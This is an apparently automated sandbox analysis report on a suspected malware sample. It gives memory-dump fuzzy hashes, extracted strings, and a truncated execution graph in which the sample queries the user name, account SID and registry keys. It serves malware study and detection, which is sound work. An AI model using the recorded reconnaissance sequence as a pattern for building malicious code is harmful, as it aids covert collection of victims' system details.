                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddeab048556d4d07336ddfd2f7cb28f9431a874adbeff206eb49318d882dac24
                                                                            • Instruction ID: f8bddbad73c09757766324ddf315e2efbd0fb4ddb4d1c3a767a184edd6a46077
                                                                            • Opcode Fuzzy Hash: ddeab048556d4d07336ddfd2f7cb28f9431a874adbeff206eb49318d882dac24
                                                                            • Instruction Fuzzy Hash: 46E0E5302047515FC711B72DE508BAE7BEADF85304F04042EE246C7751CBA5AC0AC791
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4575bd36cdf7ec64d1c7ab3784543b103ac4153060c62603fb8cc4d5bd028616
                                                                            • Instruction ID: fd03a1de8782d8224467864bc87b91912ece2dc2ec144a1f94241134d20e985e
                                                                            • Opcode Fuzzy Hash: 4575bd36cdf7ec64d1c7ab3784543b103ac4153060c62603fb8cc4d5bd028616
                                                                            • Instruction Fuzzy Hash: 66E09A332063408FDB82BB28F844ACA7B69FF82694B004152D0408B71AC73408078BA2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ae5eaf39dcb5e4af39ca5fa7956eebb8f0e8ef604bd134059268f018ab265853
                                                                            • Instruction ID: 048cdd4142bb7edd6a733bc2fd3ff85cd166aeb76df8821f6487f251e4b11cfc
                                                                            • Opcode Fuzzy Hash: ae5eaf39dcb5e4af39ca5fa7956eebb8f0e8ef604bd134059268f018ab265853
                                                                            • Instruction Fuzzy Hash: 5FE092B210C2119FD3459B20E84889B7BA8EB95220F05896EE484C7241E632D841C7A9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4ca1402bf8d225e94e71348729618caf4766b380f727d3d6076c79f4a3d00a58
                                                                            • Instruction ID: f9bd417e200a8c912c93156cd3ba3ee860ec7c58fe78bc1a0eca3a8173c0cebd
                                                                            • Opcode Fuzzy Hash: 4ca1402bf8d225e94e71348729618caf4766b380f727d3d6076c79f4a3d00a58
                                                                            • Instruction Fuzzy Hash: 3FE0D872405380EFDB42F334B8496993F6DEF02604B010056DC41CB719D7344C45C792
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7e184558b8bf562656bf13b3dbba8f44684c05ba4ee0451f0325c8da4ac82637
                                                                            • Instruction ID: 83c035b8760a4ca864ce4369a8de12a6375ffe7df719a13b071fc3f950ce6b3a
                                                                            • Opcode Fuzzy Hash: 7e184558b8bf562656bf13b3dbba8f44684c05ba4ee0451f0325c8da4ac82637
                                                                            • Instruction Fuzzy Hash: 57E0DF71A49244EFCF01EF68EC0189D7BB6DE82201B2042DBE809E72A1D6304F15C752
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c69682263f22368b7883bb84cc3e9fa5d63a8a52313a44eb4f0f148bc9da285
                                                                            • Instruction ID: 9c5bd41fb811aad7b045152051a6d1251fdedc314a135ec1d180087ccf8b5457
                                                                            • Opcode Fuzzy Hash: 0c69682263f22368b7883bb84cc3e9fa5d63a8a52313a44eb4f0f148bc9da285
                                                                            • Instruction Fuzzy Hash: 2AE0127A1143449FCB829B58DC409D53F79BF5A65470540C5F9808F672C721A821DB61
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e17c599110a0f129a3c5fc93edd296c36cccf2a9da1523e4aa5b648a6b0939af
                                                                            • Instruction ID: eebc4d32c01b70c47c49b1d5b74e7458f9df9a3c19d6389fe715f82c42cd233b
                                                                            • Opcode Fuzzy Hash: e17c599110a0f129a3c5fc93edd296c36cccf2a9da1523e4aa5b648a6b0939af
                                                                            • Instruction Fuzzy Hash: ECD05E313141289B8B092769B8189AE7BAFEEC5666702002AF70BC3B50CE695D0687D5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed77793f2bb408918f135f5cdf40156ac95ac5825d02fa57d53712d63a4307af
                                                                            • Instruction ID: b7fb854f3b541e812ed9ded449028f58ba59cc8d305ec864f646ce41981d075a
                                                                            • Opcode Fuzzy Hash: ed77793f2bb408918f135f5cdf40156ac95ac5825d02fa57d53712d63a4307af
                                                                            • Instruction Fuzzy Hash: DCE07575D0020DFFCB40EFA4D9448DDBBB9EB48200F1082A6D905E3200EB305F559B80
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac53e5f0d3641307cc16f6b63acb3d7eb8f07eb9090e14811ec0f5a9493af002
                                                                            • Instruction ID: 01ceca3989de6b6d909b3cbef3be686b8fc4b9489499100868cf485594df9f62
                                                                            • Opcode Fuzzy Hash: ac53e5f0d3641307cc16f6b63acb3d7eb8f07eb9090e14811ec0f5a9493af002
                                                                            • Instruction Fuzzy Hash: FBE04F31100312CFCA49FB14FD06B4937A9FB89714F010465D8025F778C7B41A599B86
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4edede2bd6ccfe11ad45ab6aa62df4380cca73c7c4a33e0f5562d7d9f67c883e
                                                                            • Instruction ID: f7eac789984ab253f76c3ae5b92dd59cc11e5f99fedd82ebe8bc19e862e2fa6d
                                                                            • Opcode Fuzzy Hash: 4edede2bd6ccfe11ad45ab6aa62df4380cca73c7c4a33e0f5562d7d9f67c883e
                                                                            • Instruction Fuzzy Hash: 15D01772A01208FF8F40EFA8E90195DB7F9EF45204B1045AA9909E7210EB316F009B91
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8ae6eb0f5f1e84d1ce1b5840e3f9edbba371e525385ff6789e4b196243520143
                                                                            • Instruction ID: 865ffde40ac2995ce34a435876d30b3f98a03a0be08ac8cddd12e19ec6008c1c
                                                                            • Opcode Fuzzy Hash: 8ae6eb0f5f1e84d1ce1b5840e3f9edbba371e525385ff6789e4b196243520143
                                                                            • Instruction Fuzzy Hash: A3C01232B042208B0A89B6AC701516C7AD38BC8AA6386002FEA0ED7388DE608D564388
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2ee2fa850dfcf8e0546775497351ae766d70d927c573bbb5cae237d0a216f448
                                                                            • Instruction ID: e79e27e6cf475771eb8095c9aadb8e4ca3e603d1958e867d8043f7117ae8210b
                                                                            • Opcode Fuzzy Hash: 2ee2fa850dfcf8e0546775497351ae766d70d927c573bbb5cae237d0a216f448
                                                                            • Instruction Fuzzy Hash: 83C092322901112BF70861109C0BFE53910E390B10F569225AA06EA2C6CAAEE00AC4BA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 467662139f3c73a9e3bf0ff493a0e52cd1ad0e8bc2ad6f1612c1aff6363156ae
                                                                            • Instruction ID: bee2b2822f4bb932ca9ffe1dc002d77c1a55a4f87a5811413e068e1e67328ca5
                                                                            • Opcode Fuzzy Hash: 467662139f3c73a9e3bf0ff493a0e52cd1ad0e8bc2ad6f1612c1aff6363156ae
                                                                            • Instruction Fuzzy Hash: 1DC04C7554B2D06EDF4657648D0D5857E269F5762471500C6A7818A0669A1104458A91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-626374656
                                                                            • Opcode ID: b27699e6fbb5a410877e872efff40f9769a17734eb9cf5c95eff2c68ffe4ef93
                                                                            • Instruction ID: cf65d91c92ac859e9151ea36818040783b4fc621e3ace1c3abccb64bc5e8b80e
                                                                            • Opcode Fuzzy Hash: b27699e6fbb5a410877e872efff40f9769a17734eb9cf5c95eff2c68ffe4ef93
                                                                            • Instruction Fuzzy Hash: 6CD1C1313006026BE606AAB8AD53E7CB65ABFC5304B40883CD1198F7A9DF756D1E93D6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-626374656
                                                                            • Opcode ID: de31d72c7d202dbbe57155a493e2596726b8966b8dae74e572b4442ef2ecfc75
                                                                            • Instruction ID: bffc7a9ecab61411091b717c9df074c3963970e7f8dccd40fab92878a149f369
                                                                            • Opcode Fuzzy Hash: de31d72c7d202dbbe57155a493e2596726b8966b8dae74e572b4442ef2ecfc75
                                                                            • Instruction Fuzzy Hash: EED1C0313006026BE606AAB8AD53E7CB55BBFC5300B40883CD1198F3A9DF756D0E93D6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-1209774835
                                                                            • Opcode ID: 263644d519f1e080ed9007e1603d1ea8fbe5cd7f9b17e3bc7517892407fb8216
                                                                            • Instruction ID: 53850fa9aff662e58cca90a53dc2857090d8b58beb8013630c5844414a4f98c9
                                                                            • Opcode Fuzzy Hash: 263644d519f1e080ed9007e1603d1ea8fbe5cd7f9b17e3bc7517892407fb8216
                                                                            • Instruction Fuzzy Hash: 4141C8313006022BE606A6B4AD43E3DB65AFFC5304B40493CD2198F7AADF756D0A83DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-1209774835
                                                                            • Opcode ID: 155dad80ab58625612892867bf0d5721ee96252f2b78ed6aa303246a7914bf4b
                                                                            • Instruction ID: d6d1e64cbdab9c78a92800c82d0c61e3fd6a78f6cf0f96923cab5d28d5895797
                                                                            • Opcode Fuzzy Hash: 155dad80ab58625612892867bf0d5721ee96252f2b78ed6aa303246a7914bf4b
                                                                            • Instruction Fuzzy Hash: BA41A6313406022BE606A6B4AD43E3DB65AFFC5304B40893CD2198F7A9CF796D0A43DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-1477724378
                                                                            • Opcode ID: 58730e1d4a4a74f7c1585106f13def4e052844b6c1e4415f868287b9a4b9bfb7
                                                                            • Instruction ID: c56f77b8bf71c625b522c1d122406c6f846b598113b7912c8f13296209d6196a
                                                                            • Opcode Fuzzy Hash: 58730e1d4a4a74f7c1585106f13def4e052844b6c1e4415f868287b9a4b9bfb7
                                                                            • Instruction Fuzzy Hash: CF31BC313002022BE706A6749D42E7DBA5AFFC5704B40493CE1198F79ADF756D4A83D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-1477724378
                                                                            • Opcode ID: 29ef5944ed8fc805fa38cb506a5dd695f93a3dae0660ec8f1eeb3b1ab9531f93
                                                                            • Instruction ID: bd964aafcc7df39476a3c8be732812659e79feea454f64d5eb4eace117dd8422
                                                                            • Opcode Fuzzy Hash: 29ef5944ed8fc805fa38cb506a5dd695f93a3dae0660ec8f1eeb3b1ab9531f93
                                                                            • Instruction Fuzzy Hash: BD2188313002026BE606A6A4AD42E3DB55AFFC5704B40893CE2198F7A9CF756D4A93DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-3632686342
                                                                            • Opcode ID: a47189b2c3e206b28c26ff8950f7361d9d4501c09dfdac67cace5e0f7e78ae21
                                                                            • Instruction ID: 0fe20f059e09f179f4f5ae104fefdec38cc87b904f7ffb43c70cb2071cab284b
                                                                            • Opcode Fuzzy Hash: a47189b2c3e206b28c26ff8950f7361d9d4501c09dfdac67cace5e0f7e78ae21
                                                                            • Instruction Fuzzy Hash: E831A2313002876BEB062BA0AD5697D7B26FFC63047404538E51A8FAA9CE745E4FC792
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-3632686342
                                                                            • Opcode ID: 16ac80c622fe198ba9def861b498b9077e9e9263795ac91a6681ad557fcd0597
                                                                            • Instruction ID: 269f30bd3d515789d633a9da8195449b2a8d109356e7f598e8bdaa2801cd01b7
                                                                            • Opcode Fuzzy Hash: 16ac80c622fe198ba9def861b498b9077e9e9263795ac91a6681ad557fcd0597
                                                                            • Instruction Fuzzy Hash: 262182313002476BEB062BA4ED4687DBB5AFF853007404438E11A8F7A9CE755E4F8BD2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-3147682437
                                                                            • Opcode ID: 70de3281258c462b8bcc8c03833ee62636b744c5c128c99bfcd382bad5b1b5c3
                                                                            • Instruction ID: 9dcb74681b1c2cb0fb8dd8b12443d6a55f3bef56678e20320d8321d6ba2d1285
                                                                            • Opcode Fuzzy Hash: 70de3281258c462b8bcc8c03833ee62636b744c5c128c99bfcd382bad5b1b5c3
                                                                            • Instruction Fuzzy Hash: 1621D8313002022BE60666A4AD52E7DBA5AFF85704B40453CD1098F799CF765D0E83E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-3147682437
                                                                            • Opcode ID: 7681850df71f1a6ee96ed454f239a0b5ff0e693fd665c7fb96f3abe569530bc0
                                                                            • Instruction ID: 4680870163cff572fa9d2969336a4b91f67ebb496bbd4eb5f32d4b9705478ef6
                                                                            • Opcode Fuzzy Hash: 7681850df71f1a6ee96ed454f239a0b5ff0e693fd665c7fb96f3abe569530bc0
                                                                            • Instruction Fuzzy Hash: 9611C6313002022BE60666A5AD42E3DB65BFFC5704F40893CE1198F799CF766D5E83E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (_]q$(_]q$(_]q$(_]q
                                                                            • API String ID: 0-2651352888
                                                                            • Opcode ID: f24e56eb3f50fb4214132c0d17a2c62852da6f9891b05408d90f0e535ae360fd
                                                                            • Instruction ID: d9f5c6fe5729a723c54f729eebe574fa20d033fb43065eec2019b47eb4cdff53
                                                                            • Opcode Fuzzy Hash: f24e56eb3f50fb4214132c0d17a2c62852da6f9891b05408d90f0e535ae360fd
                                                                            • Instruction Fuzzy Hash: A191AD35B043059FDB05AF68D4546AE7BB2EF85300F2485AAED06DB381DB35DE06CB91

                                                                            Execution Graph

                                                                            Execution Coverage:2.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:13.6%
                                                                            Total number of Nodes:565
                                                                            Total number of Limit Nodes:15
                                                                            execution_graph 29883 19cfa9 GetModuleFileNameA 29884 19cfe1 29883->29884 29884->29884 29933 1a7f20 29884->29933 29886 19cffd 29948 1a7860 29886->29948 29888 19d010 29964 195b20 29888->29964 29890 19d01b 30016 19c8d0 29890->30016 29894 19d044 30035 1a8080 29894->30035 29896 19d3cc 30055 1c6aca 29896->30055 29898 19d291 ThreadProxyFactory 29902 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 29898->29902 29906 19d335 ThreadProxyFactory 29898->29906 29899 19d3d1 29901 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 29899->29901 29900 19d0ca ThreadProxyFactory 29900->29896 29900->29898 29903 19d3d6 29901->29903 29904 19d2d0 29902->29904 29909 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 29903->29909 29907 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 29904->29907 29905 19d39a ThreadProxyFactory 30048 1ace51 29905->30048 29906->29899 29906->29905 29910 19d2fc 29907->29910 29912 19d42d 29909->29912 29913 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 29910->29913 29911 19d3bb 29914 195b20 36 API calls 29912->29914 29915 19d317 29913->29915 29916 19d435 29914->29916 29917 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 29915->29917 29918 1a8080 26 API calls 29916->29918 29919 19d32c 29917->29919 29920 19d445 29918->29920 30043 19b010 GetUserNameA 29919->30043 29922 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 29920->29922 29923 19d460 29922->29923 29924 195b20 36 API calls 29923->29924 29925 19d467 29924->29925 29926 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 29925->29926 29927 19d47c 29926->29927 29928 195b20 36 API calls 29927->29928 29929 19d483 ThreadProxyFactory 29928->29929 29930 19d4fa ThreadProxyFactory 29929->29930 29931 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 29929->29931 29932 19d519 29931->29932 29934 1a7f64 29933->29934 29938 1a7f3e CatchIt 29933->29938 29935 1a804e 29934->29935 29940 1a7fb8 29934->29940 29941 1a7fdd 29934->29941 30062 1a90d0 26 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 29935->30062 29937 1a8053 30063 192440 26 API calls 3 library calls 29937->30063 29938->29886 29940->29937 30060 192440 26 API calls 4 library calls 29940->30060 29945 1a7fc9 std::_Rethrow_future_exception 29941->29945 30061 192440 26 API calls 4 library calls 29941->30061 29942 1a8058 29946 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 29945->29946 29947 1a8030 ThreadProxyFactory 29945->29947 29946->29935 29947->29886 29949 1a7886 29948->29949 29950 1a788d 29949->29950 29951 1a78c2 29949->29951 29952 1a78e1 29949->29952 29950->29888 29953 1a7919 29951->29953 29954 1a78c9 29951->29954 29959 1a78d6 std::_Rethrow_future_exception 29952->29959 30065 192440 26 API calls 4 library calls 29952->30065 30066 192440 26 API calls 3 library calls 29953->30066 30064 192440 26 API calls 4 library calls 29954->30064 29958 1a78cf 29958->29959 29960 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 29958->29960 29959->29888 29961 1a7923 29960->29961 29963 1a7951 __Cnd_destroy_in_situ __Mtx_destroy_in_situ ThreadProxyFactory Concurrency::details::_TaskCollection::~_TaskCollection 29961->29963 30067 1ab866 RtlEnterCriticalSection RtlLeaveCriticalSection Concurrency::details::_CancellationTokenState::_RegisterCallback 29961->30067 29963->29888 30068 195850 29964->30068 29966 195b64 30071 194af0 29966->30071 29968 195b8b 29969 195c27 ThreadProxyFactory 29968->29969 29972 195c52 29968->29972 29970 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 29969->29970 29971 195c49 29970->29971 29971->29890 29973 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 29972->29973 29974 195c57 Mailbox 29973->29974 29975 195cb7 RegOpenKeyExA 29974->29975 29976 195d10 RegCloseKey 29975->29976 29977 195d36 29976->29977 29977->29977 29978 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 29977->29978 29981 195d4e 29978->29981 29979 195db6 ThreadProxyFactory 29980 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 29979->29980 29983 195dd9 29980->29983 29981->29979 29982 195ddd 29981->29982 29984 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 29982->29984 29983->29890 29985 195de2 RegOpenKeyExA 29984->29985 29987 195e57 RegCloseKey 29985->29987 29990 195e94 29987->29990 29988 195f0e ThreadProxyFactory 29989 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 29988->29989 29991 195f22 29989->29991 29990->29988 29992 195f26 29990->29992 29991->29890 29993 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 29992->29993 29994 195f2b __wsopen_s 29993->29994 29995 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 29994->29995 29996 195f99 29995->29996 29997 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 29996->29997 29998 195fcd 29997->29998 29999 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 29998->29999 30000 195ffe 29999->30000 30001 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 30000->30001 30002 19602f 30001->30002 30003 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 30002->30003 30004 196060 RegOpenKeyExA 30003->30004 30007 1963c1 30004->30007 30005 1964c1 ThreadProxyFactory 30006 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 30005->30006 30008 1964e3 30006->30008 30007->30005 30009 1964e7 30007->30009 30008->29890 30010 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 30009->30010 30011 1964ec GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 30010->30011 30013 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30011->30013 30014 1965b6 30013->30014 30015 195b20 28 API calls 30014->30015 30084 197c40 30016->30084 30018 19c93d 30019 19cc5d ThreadProxyFactory 30018->30019 30020 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30018->30020 30022 19cc85 30018->30022 30024 195b20 36 API calls 30018->30024 30028 1a8080 26 API calls 30018->30028 30163 198ea0 37 API calls 3 library calls 30018->30163 30164 192440 26 API calls 6 library calls 30018->30164 30021 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 30019->30021 30020->30018 30023 19cc81 30021->30023 30025 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 30022->30025 30023->29894 30047 192440 26 API calls 6 library calls 30023->30047 30024->30018 30027 19cc8a 30025->30027 30029 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30027->30029 30028->30018 30030 19cce2 30029->30030 30031 195b20 36 API calls 30030->30031 30032 19cced 30031->30032 30034 19c8d0 57 API calls 30032->30034 30036 1a80a8 30035->30036 30037 1a80f2 30035->30037 30036->30037 30038 1a80b1 30036->30038 30041 1a8101 CatchIt 30037->30041 